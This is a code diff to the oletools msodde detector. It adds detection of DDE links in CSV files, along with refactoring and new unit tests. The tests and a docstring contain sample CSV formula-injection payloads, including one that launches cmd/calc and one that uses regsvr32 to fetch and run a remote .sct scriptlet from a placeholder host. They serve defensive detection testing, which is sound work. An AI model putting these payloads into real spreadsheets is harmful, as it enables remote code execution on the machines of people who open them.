| 379 | -# end character if no separator is present. The field begin character, field end character, and field | ||
| 380 | -# separator are collectively referred to as field characters. | 388 | +# A field consists of two parts: field instructions and, optionally, a result. |
| 389 | +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied | ||
| 390 | +# with a value of 1. This is the field begin character. All fields MUST end | ||
| 391 | +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1. | ||
| 392 | +# This is the field end character. If the field has a result, then there MUST | ||
| 393 | +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1 | ||
| 394 | +# somewhere between the field begin character and the field end character. This | ||
| 395 | +# is the field separator. The field result is the content between the field | ||
| 396 | +# separator and the field end character. The field instructions are the content | ||
| 397 | +# between the field begin character and the field separator, if one is present, | ||
| 398 | +# or between the field begin character and the field end character if no | ||
| 399 | +# separator is present. The field begin character, field end character, and | ||
| 400 | +# field separator are collectively referred to as field characters. | ||
| 381 | 401 | ||
| 382 | 402 | ||
| 383 | def process_doc_field(data): | 403 | def process_doc_field(data): |
| @@ -387,7 +407,6 @@ def process_doc_field(data): | @@ -387,7 +407,6 @@ def process_doc_field(data): | ||
| 387 | log.debug('processing field \'{0}\''.format(data)) | 407 | log.debug('processing field \'{0}\''.format(data)) |
| 388 | 408 | ||
| 389 | if data.lstrip().lower().startswith(u'dde'): | 409 | if data.lstrip().lower().startswith(u'dde'): |
| 390 | - #log.debug('--> is DDE!') | ||
| 391 | return data | 410 | return data |
| 392 | elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'): | 411 | elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'): |
| 393 | return data | 412 | return data |
| @@ -512,7 +531,6 @@ def process_doc(filepath): | @@ -512,7 +531,6 @@ def process_doc(filepath): | ||
| 512 | return u'\n'.join(links) | 531 | return u'\n'.join(links) |
| 513 | 532 | ||
| 514 | 533 | ||
| 515 | - | ||
| 516 | def process_xls(filepath): | 534 | def process_xls(filepath): |
| 517 | """ find dde links in excel ole file """ | 535 | """ find dde links in excel ole file """ |
| 518 | 536 | ||
| @@ -531,17 +549,15 @@ def process_xls(filepath): | @@ -531,17 +549,15 @@ def process_xls(filepath): | ||
| 531 | 549 | ||
| 532 | 550 | ||
| 533 | def process_docx(filepath, field_filter_mode=None): | 551 | def process_docx(filepath, field_filter_mode=None): |
| 552 | + """ find dde-links (and other fields) in Word 2007+ files """ | ||
| 534 | log.debug('process_docx') | 553 | log.debug('process_docx') |
| 535 | all_fields = [] | 554 | all_fields = [] |
| 536 | - with zipfile.ZipFile(filepath) as z: | ||
| 537 | - for filepath in z.namelist(): | 555 | + with zipfile.ZipFile(filepath) as zipper: |
| 556 | + for filepath in zipper.namelist(): | ||
| 538 | if filepath in LOCATIONS: | 557 | if filepath in LOCATIONS: |
| 539 | - data = z.read(filepath) | 558 | + data = zipper.read(filepath) |
| 540 | fields = process_xml(data) | 559 | fields = process_xml(data) |
| 541 | if len(fields) > 0: | 560 | if len(fields) > 0: |
| 542 | - #print ('DDE Links in %s:'%filepath) | ||
| 543 | - #for f in fields: | ||
| 544 | - # print(f) | ||
| 545 | all_fields.extend(fields) | 561 | all_fields.extend(fields) |
| 546 | 562 | ||
| 547 | # apply field command filter | 563 | # apply field command filter |
| @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None): | @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None): | ||
| 560 | .format(field_filter_mode)) | 576 | .format(field_filter_mode)) |
| 561 | 577 | ||
| 562 | return u'\n'.join(clean_fields) | 578 | return u'\n'.join(clean_fields) |
| 563 | - | 579 | + |
| 580 | + | ||
| 564 | def process_xml(data): | 581 | def process_xml(data): |
| 582 | + """ Find dde-links and other fields in office XML data """ | ||
| 565 | # parse the XML data: | 583 | # parse the XML data: |
| 566 | root = ET.fromstring(data) | 584 | root = ET.fromstring(data) |
| 567 | fields = [] | 585 | fields = [] |
| @@ -569,39 +587,41 @@ def process_xml(data): | @@ -569,39 +587,41 @@ def process_xml(data): | ||
| 569 | level = 0 | 587 | level = 0 |
| 570 | # find all the tags 'w:p': | 588 | # find all the tags 'w:p': |
| 571 | # parse each for begin and end tags, to group DDE strings | 589 | # parse each for begin and end tags, to group DDE strings |
| 572 | - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags | 590 | + # fldChar can be in either a w:r element, floating alone in the w:p |
| 591 | + # or spread accross w:p tags | ||
| 573 | # escape DDE if quoted etc | 592 | # escape DDE if quoted etc |
| 574 | # (each is a chunk of a DDE link) | 593 | # (each is a chunk of a DDE link) |
| 575 | 594 | ||
| 576 | for subs in root.iter(TAG_W_P): | 595 | for subs in root.iter(TAG_W_P): |
| 577 | elem = None | 596 | elem = None |
| 578 | - for e in subs: | ||
| 579 | - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT | ||
| 580 | - if e.tag == TAG_W_R: | ||
| 581 | - for child in e: | ||
| 582 | - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT: | 597 | + for curr_elem in subs: |
| 598 | + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT | ||
| 599 | + if curr_elem.tag == TAG_W_R: | ||
| 600 | + for child in curr_elem: | ||
| 601 | + if child.tag == TAG_W_FLDCHAR or \ | ||
| 602 | + child.tag == TAG_W_INSTRTEXT: | ||
| 583 | elem = child | 603 | elem = child |
| 584 | break | 604 | break |
| 585 | else: | 605 | else: |
| 586 | - elem = e | ||
| 587 | - #this should be an error condition | 606 | + elem = curr_elem |
| 607 | + # this should be an error condition | ||
| 588 | if elem is None: | 608 | if elem is None: |
| 589 | continue | 609 | continue |
| 590 | - | ||
| 591 | - #check if FLDCHARTYPE and whether "begin" or "end" tag | 610 | + |
| 611 | + # check if FLDCHARTYPE and whether "begin" or "end" tag | ||
| 592 | if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None: | 612 | if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None: |
| 593 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin": | 613 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin": |
| 594 | - level += 1 | 614 | + level += 1 |
| 595 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "end": | 615 | if elem.attrib[ATTR_W_FLDCHARTYPE] == "end": |
| 596 | level -= 1 | 616 | level -= 1 |
| 597 | - if level == 0 or level == -1 : # edge-case where level becomes -1 | 617 | + if level == 0 or level == -1: # edge-case; level becomes -1 |
| 598 | fields.append(ddetext) | 618 | fields.append(ddetext) |
| 599 | ddetext = u'' | 619 | ddetext = u'' |
| 600 | - level = 0 # reset edge-case | ||
| 601 | - | 620 | + level = 0 # reset edge-case |
| 621 | + | ||
| 602 | # concatenate the text of the field, if present: | 622 | # concatenate the text of the field, if present: |
| 603 | if elem.tag == TAG_W_INSTRTEXT and elem.text is not None: | 623 | if elem.tag == TAG_W_INSTRTEXT and elem.text is not None: |
| 604 | - #expand field code if QUOTED | 624 | + # expand field code if QUOTED |
| 605 | ddetext += unquote(elem.text) | 625 | ddetext += unquote(elem.text) |
| 606 | 626 | ||
| 607 | for elem in root.iter(TAG_W_FLDSIMPLE): | 627 | for elem in root.iter(TAG_W_FLDSIMPLE): |
| @@ -611,25 +631,28 @@ def process_xml(data): | @@ -611,25 +631,28 @@ def process_xml(data): | ||
| 611 | 631 | ||
| 612 | return fields | 632 | return fields |
| 613 | 633 | ||
| 614 | -def unquote(field): | 634 | + |
| 635 | +def unquote(field): | ||
| 615 | if "QUOTE" not in field or NO_QUOTES: | 636 | if "QUOTE" not in field or NO_QUOTES: |
| 616 | return field | 637 | return field |
| 617 | - #split into components | 638 | + # split into components |
| 618 | parts = field.strip().split(" ") | 639 | parts = field.strip().split(" ") |
| 619 | ddestr = "" | 640 | ddestr = "" |
| 620 | - for p in parts[1:]: | ||
| 621 | - try: | ||
| 622 | - ch = chr(int(p)) | 641 | + for part in parts[1:]: |
| 642 | + try: | ||
| 643 | + character = chr(int(part)) | ||
| 623 | except ValueError: | 644 | except ValueError: |
| 624 | - ch = p | ||
| 625 | - ddestr += ch | 645 | + character = part |
| 646 | + ddestr += character | ||
| 626 | return ddestr | 647 | return ddestr |
| 627 | 648 | ||
| 649 | + | ||
| 628 | # "static variables" for field_is_blacklisted: | 650 | # "static variables" for field_is_blacklisted: |
| 629 | FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+') | 651 | FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+') |
| 630 | FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST) | 652 | FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST) |
| 631 | FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$') | 653 | FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$') |
| 632 | 654 | ||
| 655 | + | ||
| 633 | def field_is_blacklisted(contents): | 656 | def field_is_blacklisted(contents): |
| 634 | """ Check if given field contents matches any in FIELD_BLACKLIST | 657 | """ Check if given field contents matches any in FIELD_BLACKLIST |
| 635 | 658 | ||
| @@ -651,7 +674,7 @@ def field_is_blacklisted(contents): | @@ -651,7 +674,7 @@ def field_is_blacklisted(contents): | ||
| 651 | index = FIELD_BLACKLIST_CMDS.index(words[0].lower()) | 674 | index = FIELD_BLACKLIST_CMDS.index(words[0].lower()) |
| 652 | except ValueError: # first word is no blacklisted command | 675 | except ValueError: # first word is no blacklisted command |
| 653 | return False | 676 | return False |
| 654 | - log.debug('trying to match "{0}" to blacklist command {0}' | 677 | + log.debug('trying to match "{0}" to blacklist command {1}' |
| 655 | .format(contents, FIELD_BLACKLIST[index])) | 678 | .format(contents, FIELD_BLACKLIST[index])) |
| 656 | _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \ | 679 | _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \ |
| 657 | = FIELD_BLACKLIST[index] | 680 | = FIELD_BLACKLIST[index] |
| @@ -706,14 +729,15 @@ def field_is_blacklisted(contents): | @@ -706,14 +729,15 @@ def field_is_blacklisted(contents): | ||
| 706 | if 'numeric' in sw_format: | 729 | if 'numeric' in sw_format: |
| 707 | arg_choices = [] # too many choices to list them here | 730 | arg_choices = [] # too many choices to list them here |
| 708 | else: | 731 | else: |
| 709 | - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents)) | 732 | + log.debug('unexpected switch {0} in "{1}"' |
| 733 | + .format(switch, contents)) | ||
| 710 | return False | 734 | return False |
| 711 | 735 | ||
| 712 | # if nothing went wrong sofar, the contents seems to match the blacklist | 736 | # if nothing went wrong sofar, the contents seems to match the blacklist |
| 713 | return True | 737 | return True |
| 714 | 738 | ||
| 715 | 739 | ||
| 716 | -def process_xlsx(filepath, filed_filter_mode=None): | 740 | +def process_xlsx(filepath): |
| 717 | """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """ | 741 | """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """ |
| 718 | dde_links = [] | 742 | dde_links = [] |
| 719 | parser = ooxml.XmlParser(filepath) | 743 | parser = ooxml.XmlParser(filepath) |
| @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None): | @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None): | ||
| 733 | try: | 757 | try: |
| 734 | logging.info('Parsing non-xml subfile {0} with content type {1}' | 758 | logging.info('Parsing non-xml subfile {0} with content type {1}' |
| 735 | .format(subfile, content_type)) | 759 | .format(subfile, content_type)) |
| 736 | - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile): | 760 | + for record in xls_parser.parse_xlsb_part(handle, content_type, |
| 761 | + subfile): | ||
| 737 | logging.debug('{0}: {1}'.format(subfile, record)) | 762 | logging.debug('{0}: {1}'.format(subfile, record)) |
| 738 | if isinstance(record, xls_parser.XlsbBeginSupBook) and \ | 763 | if isinstance(record, xls_parser.XlsbBeginSupBook) and \ |
| 739 | record.link_type == \ | 764 | record.link_type == \ |
| @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser): | @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser): | ||
| 791 | 816 | ||
| 792 | RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent | 817 | RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent |
| 793 | 818 | ||
| 819 | + | ||
| 794 | def process_rtf(file_handle, field_filter_mode=None): | 820 | def process_rtf(file_handle, field_filter_mode=None): |
| 795 | - log.debug('process_rtf') | 821 | + """ find dde links or other fields in rtf file """ |
| 796 | all_fields = [] | 822 | all_fields = [] |
| 797 | data = RTF_START + file_handle.read() # read complete file into memory! | 823 | data = RTF_START + file_handle.read() # read complete file into memory! |
| 798 | file_handle.close() | 824 | file_handle.close() |
| @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None): | @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None): | ||
| 818 | return u'\n'.join(clean_fields) | 844 | return u'\n'.join(clean_fields) |
| 819 | 845 | ||
| 820 | 846 | ||
| 847 | +# threshold when to consider a csv file "small"; also used as sniffing size | ||
| 848 | +CSV_SMALL_THRESH = 1024 | ||
| 849 | + | ||
| 850 | +# format of dde link: program-name | arguments ! unimportant | ||
| 851 | +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*') | ||
| 852 | + | ||
| 853 | +# allowed delimiters (python sniffer would use nearly any char). Taken from | ||
| 854 | +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas | ||
| 855 | +CSV_DELIMITERS = ',\t ;|^' | ||
| 856 | + | ||
| 857 | + | ||
| 858 | +def process_csv(filepath): | ||
| 859 | + """ find dde in csv text | ||
| 860 | + | ||
| 861 | + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or | ||
| 862 | + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...] | ||
| 863 | + | ||
| 864 | + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter | ||
| 865 | + chars the same way that excel does. Tested to some extend in unittests. | ||
| 866 | + | ||
| 867 | + This can only find DDE-links, no other "suspicious" constructs (yet). | ||
| 868 | + """ | ||
| 869 | + | ||
| 870 | + results = [] | ||
| 871 | + with open(filepath, 'r') as file_handle: | ||
| 872 | + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS) | ||
| 873 | + is_small = file_handle.tell() < CSV_SMALL_THRESH | ||
| 874 | + | ||
| 875 | + if is_small and not results: | ||
| 876 | + # easy to mis-sniff small files. Try different delimiters | ||
| 877 | + log.debug('small file, no results; try all delimiters') | ||
| 878 | + file_handle.seek(0) | ||
| 879 | + other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '') | ||
| 880 | + for delim in other_delim: | ||
| 881 | + try: | ||
| 882 | + file_handle.seek(0) | ||
| 883 | + results, _ = process_csv_dialect(file_handle, delim) | ||
| 884 | + except csv.Error: # e.g. sniffing fails | ||
| 885 | + log.debug('failed to csv-parse with delimiter {0!r}' | ||
| 886 | + .format(delim)) | ||
| 887 | + | ||
| 888 | + if is_small and not results: | ||
| 889 | + # try whole file as single cell, since sniffing fails in this case | ||
| 890 | + log.debug('last attempt: take whole file as single unquoted cell') | ||
| 891 | + file_handle.seek(0) | ||
| 892 | + match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH)) | ||
| 893 | + if match: | ||
| 894 | + results.append(u' '.join(match.groups()[:2])) | ||
| 895 | + | ||
| 896 | + return u'\n'.join(results) | ||
| 897 | + | ||
| 898 | + | ||
| 899 | +def process_csv_dialect(file_handle, delimiters): | ||
| 900 | + """ helper for process_csv: process with a specific csv dialect """ | ||
| 901 | + | ||
| 902 | + # determine dialect = delimiter chars, quote chars, ... | ||
| 903 | + dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH), | ||
| 904 | + delimiters=delimiters) | ||
| 905 | + dialect.strict = False # microsoft is never strict | ||
| 906 | + log.debug('sniffed csv dialect with delimiter {0!r} ' | ||
| 907 | + 'and quote char {1!r}' | ||
| 908 | + .format(dialect.delimiter, dialect.quotechar)) | ||
| 909 | + | ||
| 910 | + # rewind file handle to start | ||
| 911 | + file_handle.seek(0) | ||
| 912 | + | ||
| 913 | + # loop over all csv rows and columns | ||
| 914 | + results = [] | ||
| 915 | + reader = csv.reader(file_handle, dialect) | ||
| 916 | + for row in reader: | ||
| 917 | + for cell in row: | ||
| 918 | + # check if cell matches | ||
| 919 | + match = CSV_DDE_FORMAT.match(cell) | ||
| 920 | + if match: | ||
| 921 | + results.append(u' '.join(match.groups()[:2])) | ||
| 922 | + return results, dialect | ||
| 923 | + | ||
| 924 | + | ||
| 821 | def process_file(filepath, field_filter_mode=None): | 925 | def process_file(filepath, field_filter_mode=None): |
| 822 | - """ decides which of process_doc/x or process_xls/x to call """ | 926 | + """ decides which of the process_* functions to call """ |
| 823 | if olefile.isOleFile(filepath): | 927 | if olefile.isOleFile(filepath): |
| 824 | - log.debug('checking streams to see whether this is xls') | 928 | + log.debug('Is OLE. Checking streams to see whether this is xls') |
| 825 | if xls_parser.is_xls(filepath): | 929 | if xls_parser.is_xls(filepath): |
| 930 | + log.debug('Process file as excel 2003 (xls)') | ||
| 826 | return process_xls(filepath) | 931 | return process_xls(filepath) |
| 827 | else: | 932 | else: |
| 933 | + log.debug('Process file as word 2003 (doc)') | ||
| 828 | return process_doc(filepath) | 934 | return process_doc(filepath) |
| 829 | 935 | ||
| 830 | with open(filepath, 'rb') as file_handle: | 936 | with open(filepath, 'rb') as file_handle: |
| 831 | - if file_handle.read(4) == RTF_START: | ||
| 832 | - # This is a RTF file | 937 | + if file_handle.read(4) == RTF_START: |
| 938 | + log.debug('Process file as rtf') | ||
| 833 | return process_rtf(file_handle, field_filter_mode) | 939 | return process_rtf(file_handle, field_filter_mode) |
| 834 | 940 | ||
| 835 | try: | 941 | try: |
| 836 | doctype = ooxml.get_type(filepath) | 942 | doctype = ooxml.get_type(filepath) |
| 837 | - except Exception: | ||
| 838 | - log.debug('Exception trying to xml-parse file', exc_info=True) | 943 | + log.debug('Detected file type: {0}'.format(doctype)) |
| 944 | + except Exception as exc: | ||
| 945 | + log.debug('Exception trying to xml-parse file: {0}'.format(exc)) | ||
| 839 | doctype = None | 946 | doctype = None |
| 840 | 947 | ||
| 841 | - if doctype: | ||
| 842 | - log.debug('Detected file type: {0}'.format(doctype)) | ||
| 843 | if doctype == ooxml.DOCTYPE_EXCEL: | 948 | if doctype == ooxml.DOCTYPE_EXCEL: |
| 844 | - return process_xlsx(filepath, field_filter_mode) | ||
| 845 | - else: | 949 | + log.debug('Process file as excel 2007+ (xlsx)') |
| 950 | + return process_xlsx(filepath) | ||
| 951 | + elif doctype is None: | ||
| 952 | + log.debug('Process file as csv') | ||
| 953 | + return process_csv(filepath) | ||
| 954 | + else: # could be docx; if not: this is the old default code path | ||
| 955 | + log.debug('Process file as word 2007+ (docx)') | ||
| 846 | return process_docx(filepath, field_filter_mode) | 956 | return process_docx(filepath, field_filter_mode) |
| 847 | 957 | ||
| 848 | 958 | ||
| 849 | -#=== MAIN ================================================================= | 959 | +# === MAIN ================================================================= |
| 850 | 960 | ||
| 851 | def main(cmd_line_args=None): | 961 | def main(cmd_line_args=None): |
| 852 | """ Main function, called if this file is called as a script | 962 | """ Main function, called if this file is called as a script |
| @@ -868,10 +978,10 @@ def main(cmd_line_args=None): | @@ -868,10 +978,10 @@ def main(cmd_line_args=None): | ||
| 868 | if args.json and args.loglevel.lower() == 'debug': | 978 | if args.json and args.loglevel.lower() == 'debug': |
| 869 | log.warning('Debug log output will not be json-compatible!') | 979 | log.warning('Debug log output will not be json-compatible!') |
| 870 | 980 | ||
| 871 | - if args.nounquote : | 981 | + if args.nounquote: |
| 872 | global NO_QUOTES | 982 | global NO_QUOTES |
| 873 | NO_QUOTES = True | 983 | NO_QUOTES = True |
| 874 | - | 984 | + |
| 875 | if args.json: | 985 | if args.json: |
| 876 | jout = [] | 986 | jout = [] |
| 877 | jout.append(BANNER_JSON) | 987 | jout.append(BANNER_JSON) |
| @@ -890,7 +1000,7 @@ def main(cmd_line_args=None): | @@ -890,7 +1000,7 @@ def main(cmd_line_args=None): | ||
| 890 | except Exception as exc: | 1000 | except Exception as exc: |
| 891 | if args.json: | 1001 | if args.json: |
| 892 | jout.append(dict(type='error', error=type(exc).__name__, | 1002 | jout.append(dict(type='error', error=type(exc).__name__, |
| 893 | - message=str(exc))) # strange: str(exc) is enclosed in "" | 1003 | + message=str(exc))) |
| 894 | else: | 1004 | else: |
| 895 | raise # re-raise last known exception, keeping trace intact | 1005 | raise # re-raise last known exception, keeping trace intact |
| 896 | 1006 |
tests/msodde/test_basic.py
| @@ -17,11 +17,13 @@ from traceback import print_exc | @@ -17,11 +17,13 @@ from traceback import print_exc | ||
| 17 | 17 | ||
| 18 | 18 | ||
| 19 | class TestReturnCode(unittest.TestCase): | 19 | class TestReturnCode(unittest.TestCase): |
| 20 | + """ check return codes and exception behaviour (not text output) """ | ||
| 20 | 21 | ||
| 21 | def test_valid_doc(self): | 22 | def test_valid_doc(self): |
| 22 | """ check that a valid doc file leads to 0 exit status """ | 23 | """ check that a valid doc file leads to 0 exit status """ |
| 23 | - for filename in ('dde-test-from-office2003', 'dde-test-from-office2016', | ||
| 24 | - 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | 24 | + for filename in ( |
| 25 | + 'dde-test-from-office2003', 'dde-test-from-office2016', | ||
| 26 | + 'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'): | ||
| 25 | self.do_test_validity(join(BASE_DIR, 'msodde', | 27 | self.do_test_validity(join(BASE_DIR, 'msodde', |
| 26 | filename + '.doc')) | 28 | filename + '.doc')) |
| 27 | 29 | ||
| @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase): | @@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase): | ||
| 65 | except Exception: | 67 | except Exception: |
| 66 | have_exception = True | 68 | have_exception = True |
| 67 | print_exc() | 69 | print_exc() |
| 68 | - except SystemExit as se: # sys.exit() was called | ||
| 69 | - return_code = se.code | ||
| 70 | - if se.code is None: | 70 | + except SystemExit as exc: # sys.exit() was called |
| 71 | + return_code = exc.code | ||
| 72 | + if exc.code is None: | ||
| 71 | return_code = 0 | 73 | return_code = 0 |
| 72 | 74 | ||
| 73 | self.assertEqual(expect_error, have_exception or (return_code != 0), | 75 | self.assertEqual(expect_error, have_exception or (return_code != 0), |
| @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase): | @@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase): | ||
| 77 | 79 | ||
| 78 | 80 | ||
| 79 | class TestDdeLinks(unittest.TestCase): | 81 | class TestDdeLinks(unittest.TestCase): |
| 82 | + """ capture output of msodde and check dde-links are found correctly """ | ||
| 80 | 83 | ||
| 81 | def get_dde_from_output(self, capturer): | 84 | def get_dde_from_output(self, capturer): |
| 82 | - """ helper to read dde links from captured output """ | 85 | + """ helper to read dde links from captured output |
| 86 | + | ||
| 87 | + duplicate in tests/msodde/test_csv | ||
| 88 | + """ | ||
| 83 | have_start_line = False | 89 | have_start_line = False |
| 84 | result = [] | 90 | result = [] |
| 85 | for line in capturer: | 91 | for line in capturer: |
| @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase): | @@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase): | ||
| 90 | elif line == 'DDE Links:': | 96 | elif line == 'DDE Links:': |
| 91 | have_start_line = True | 97 | have_start_line = True |
| 92 | 98 | ||
| 93 | - self.assertTrue(have_start_line) # ensure output was complete | 99 | + self.assertTrue(have_start_line) # ensure output was complete |
| 94 | return result | 100 | return result |
| 95 | 101 | ||
| 96 | def test_with_dde(self): | 102 | def test_with_dde(self): |
tests/msodde/test_blacklist.py
| @@ -39,8 +39,8 @@ EXAMPLES_MATCH = ( | @@ -39,8 +39,8 @@ EXAMPLES_MATCH = ( | ||
| 39 | r'ADVANCE \x 150', | 39 | r'ADVANCE \x 150', |
| 40 | r'AUTHOR', | 40 | r'AUTHOR', |
| 41 | r'AUTHOR "Tony Caruso"', | 41 | r'AUTHOR "Tony Caruso"', |
| 42 | - r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" | ||
| 43 | - r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | 42 | + r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033" |
| 43 | + r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo | ||
| 44 | r'COMMENTS', | 44 | r'COMMENTS', |
| 45 | r'COMMENTS "I came, I saw, I was not impressed."', | 45 | r'COMMENTS "I came, I saw, I was not impressed."', |
| 46 | r'CREATEDATE', | 46 | r'CREATEDATE', |
| @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = ( | @@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = ( | ||
| 228 | r'SKIPIF MERGEFIELD Order < 100', | 228 | r'SKIPIF MERGEFIELD Order < 100', |
| 229 | ) | 229 | ) |
| 230 | 230 | ||
| 231 | + | ||
| 231 | class TestBlacklist(unittest.TestCase): | 232 | class TestBlacklist(unittest.TestCase): |
| 232 | """ Tests msodde blacklist feature """ | 233 | """ Tests msodde blacklist feature """ |
| 233 | 234 |
tests/msodde/test_csv.py
0 → 100644
| 1 | +#!/usr/bin/env python3 | ||
| 2 | + | ||
| 3 | + | ||
| 4 | +""" Check various csv examples """ | ||
| 5 | + | ||
| 6 | +import unittest | ||
| 7 | +from tempfile import mkstemp | ||
| 8 | +import os | ||
| 9 | +from os.path import join | ||
| 10 | + | ||
| 11 | +from oletools import msodde | ||
| 12 | +from tests.test_utils import OutputCapture, DATA_BASE_DIR | ||
| 13 | + | ||
| 14 | + | ||
| 15 | +class TestCSV(unittest.TestCase): | ||
| 16 | + """ Check various csv examples """ | ||
| 17 | + | ||
| 18 | + DO_DEBUG = False | ||
| 19 | + | ||
| 20 | + def test_texts(self): | ||
| 21 | + """ write some sample texts to file, run those """ | ||
| 22 | + SAMPLES = ( | ||
| 23 | + "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''", | ||
| 24 | + "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " + | ||
| 25 | + "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''", | ||
| 26 | + "completely innocent text" | ||
| 27 | + ) | ||
| 28 | + | ||
| 29 | + LONG_SAMPLE_FACTOR = 100 # make len(sample) > CSV_SMALL_THRESH | ||
| 30 | + DELIMITERS = ',\t ;|^' | ||
| 31 | + QUOTES = '', '"' # no ' since samples use those "internally" | ||
| 32 | + PREFIXES = ('', '{quote}item-before{quote}{delim}', | ||
| 33 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR, | ||
| 34 | + '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR + | ||
| 35 | + '{quote}item-before{quote}{delim}') | ||
| 36 | + SUFFIXES = ('', '{delim}{quote}item-after{quote}', | ||
| 37 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR, | ||
| 38 | + '{delim}{quote}item-after{quote}' + | ||
| 39 | + '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR) | ||
| 40 | + | ||
| 41 | + for sample_core in SAMPLES: | ||
| 42 | + for prefix in PREFIXES: | ||
| 43 | + for suffix in SUFFIXES: | ||
| 44 | + for delim in DELIMITERS: | ||
| 45 | + for quote in QUOTES: | ||
| 46 | + # without quoting command is split at space or | | ||
| 47 | + if quote == '' and delim in sample_core: | ||
| 48 | + continue | ||
| 49 | + | ||
| 50 | + sample = \ | ||
| 51 | + prefix.format(quote=quote, delim=delim) + \ | ||
| 52 | + quote + sample_core + quote + \ | ||
| 53 | + suffix.format(quote=quote, delim=delim) | ||
| 54 | + output = self.write_and_run(sample) | ||
| 55 | + n_links = len(self.get_dde_from_output(output)) | ||
| 56 | + desc = 'sample with core={0!r}, prefix-len {1}, ' \ | ||
| 57 | + 'suffix-len {2}, delim {3!r} and quote ' \ | ||
| 58 | + '{4!r}'.format(sample_core, len(prefix), | ||
| 59 | + len(suffix), delim, quote) | ||
| 60 | + if 'innocent' in sample: | ||
| 61 | + self.assertEqual(n_links, 0, 'found dde-link ' | ||
| 62 | + 'in clean sample') | ||
| 63 | + else: | ||
| 64 | + msg = 'Failed to find dde-link in ' + desc | ||
| 65 | + self.assertEqual(n_links, 1, msg) | ||
| 66 | + if self.DO_DEBUG: | ||
| 67 | + print('Worked: ' + desc) | ||
| 68 | + | ||
| 69 | + def test_file(self): | ||
| 70 | + """ test simple small example file """ | ||
| 71 | + filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv') | ||
| 72 | + with OutputCapture() as capturer: | ||
| 73 | + capturer.reload_module(msodde) # re-create logger | ||
| 74 | + ret_code = msodde.main([filename, ]) | ||
| 75 | + self.assertEqual(ret_code, 0) | ||
| 76 | + links = self.get_dde_from_output(capturer) | ||
| 77 | + self.assertEqual(len(links), 1) | ||
| 78 | + self.assertEqual(links[0], | ||
| 79 | + r"cmd '/k \..\..\..\Windows\System32\calc.exe'") | ||
| 80 | + | ||
| 81 | + def write_and_run(self, sample_text): | ||
| 82 | + """ helper for test_texts: save text to file, run through msodde """ | ||
| 83 | + filename = None | ||
| 84 | + handle = 0 | ||
| 85 | + try: | ||
| 86 | + handle, filename = mkstemp(prefix='oletools-test-csv-', text=True) | ||
